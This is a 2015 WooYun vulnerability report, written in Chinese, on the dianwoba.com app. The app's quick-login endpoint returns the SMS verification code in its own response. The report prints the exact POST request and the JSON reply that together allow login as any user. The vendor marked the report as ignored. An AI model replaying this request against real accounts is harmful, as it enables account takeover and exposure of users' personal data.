漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2015-0146618
漏洞标题:点我吧任意用户登录漏洞
相关厂商:dianwoba.com
漏洞作者: cunzhangok
提交时间:2015-10-14 11:05
修复时间:2015-10-19 11:06
公开时间:2015-10-19 11:06
漏洞类型:未授权访问/权限绕过
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2015-10-14: 细节已通知厂商并且等待厂商处理中
2015-10-19: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
该app 在无账号快捷登录 模块中,可以实现任意贵公司的用户,都可以轻松登录(绕开校验码逻辑),实现账户信息完全泄露。(问题是这个漏洞,只能发布新版本app才能搞定),因为他们验证码验证逻辑写在客户端了。
详细说明:
在手机登录页面点击“无账号快捷登录”----》输入手机号码---》点击发送校验码---》
请求数据格式:
POST /m/v3_1/user!getVerifyNoAccount.do HTTP/1.1
Content-Length: 34
Content-Type: text/plain; charset=GBK
Host: ma.dianwoba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
{"bVerify":1,"user":"18612345678"}
返回结果:
{
"status": 1,
"data": {
"content": "439772",
"bSend": 2
},
"api": "user_getVerifyNoAccount"
}
其中content就是验证码。
直接输入验证码实现用户登录。
漏洞证明:
在手机登录页面点击“无账号快捷登录”----》输入手机号码---》点击发送校验码---》
请求数据格式:
POST /m/v3_1/user!getVerifyNoAccount.do HTTP/1.1
Content-Length: 34
Content-Type: text/plain; charset=GBK
Host: ma.dianwoba.com
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
{"bVerify":1,"user":"18612345678"}
返回结果:
{
"status": 1,
"data": {
"content": "439772",
"bSend": 2
},
"api": "user_getVerifyNoAccount"
}
其中content就是验证码。
直接输入验证码实现用户登录。
修复方案:
该漏洞无法修复,因为验证码的验证逻辑是放在客户端里面的,对!是客户端里面的。(我对这个设计是真心醉了),修复这个问题,只能发布新版本。
版权声明:转载请注明来源 cunzhangok@乌云
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2015-10-19 11:06
厂商回复:
漏洞Rank:4 (WooYun评价)
最新状态:
暂无